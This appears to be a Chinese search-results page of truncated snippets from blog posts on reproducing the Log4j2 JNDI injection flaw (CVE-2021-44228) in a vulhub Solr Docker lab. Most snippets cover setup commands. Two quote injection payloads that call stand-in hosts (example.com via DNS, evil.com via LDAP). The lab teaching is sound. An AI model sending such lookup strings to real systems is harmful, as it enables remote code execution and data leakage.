关于靶场搭建的可以百度vulhub靶场搭建,建议Ubuntu搭建。 前言: Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。 2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。L
一、环境搭建(用相同的环境才能保证一定成功) 下载vulhub,其他环境可能存在GET请求无效问题: git clone https://github.com/vulhub/vulhub.git 切换到指定漏洞环境目录: vulhub/log4j/CVE-2021-44228 开启docker: docker compose up -d ➜ vulhub git:(master) cd vulhub/log4j/CVE-2021-44228 ➜ CVE-2021-4...
https://github.com/vulhub/vulhub 本次漏洞复现也是基于Vulhub 02 漏洞环境搭建 代码语言:javascript 代码运行次数:0 运行 AI代码解释 docker-compose up-d--build 访问http://127.0.0.1:8983/solr/#/ 03 Dnslog测试 在DNSlog平台请求一个dns域名:3j7r1s.dnslog.cn ...
本文对Apache log4j2(CVE-2021-44228)进行漏洞复现,Apache Log4j2是一个基于Java的日志记录工具,2021年12月9日爆出Log4j2组件在处理程序日志记录时存在JNDI注入漏洞,掀起了不小风浪。工具:攻击机:win10笔记本 192.168.64.1 靶机:vulhub 192.168.64.170 模拟VPS:win10 192.168.64.149软件工具:Burpsuite JNDI-Injection-...
https://github.com/vulhub/vulhub 本次漏洞复现也是基于Vulhub 02漏洞环境搭建 docker-compose up -d --build 访问http://127.0.0.1:8983/solr/#/ 03Dnslog测试 在DNSlog平台请求一个dns域名:3j7r1s.dnslog.cn 构造: ${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload: ...
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞 docker-composebuild //可选 docker-compose up -d 完成试验后,记得删除漏洞环境哦~~ docker-compose down docker system prune -a -f //可选 简单访问一下,说明Log4j2 JNDI注入漏洞(CVE-2021-44228)环境搭建成功了 ...
log4j-CVE-2021-44228-vulhub复现 Simont 2022-11-09 15:28:04 229322 所属地 山东省Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意...
搭建vulhub靶场与log4j-CVE-2021-44228的复现: 本节要用的环境和工具 链接:https://pan.baidu.com/s/1uw-jMmSReDGSr0oc7LyzpA?pwd=x9kp 提取码:x9kp mkdir /usr/docker/ cd /usr/docker/ rz:上传离线包 安装服务: yum install yum install docker-ce-17.12.1.ce-1.el7.centos.x86_64.rpm -y...
复现环境 Vulhub 搭建log4j漏洞环境 环境搭建 1.vulhub靶场下载地址: https://vulhub.org/#/docs/2.使用docker搭建vulfocus的漏洞靶场 docker pull vulfocus/log4j2-rce-2021-12-09:latest docker run -d -p 80:8080 vulfocus/log4j2-rce-2021-12-09:latest ...
cd vulhub/log4j/CVE-2021-44228 启动Docker环境: bash docker-compose up -d 这个命令会启动一个包含Apache Solr(依赖Log4j 2.14.1)的Docker容器,Solr是一个开源的搜索平台,经常被用作测试Log4j漏洞的目标。 4. 验证漏洞环境是否成功搭建 访问Solr的Web界面,通常地址是http://127.0.0.1:8983/solr/(具体地址...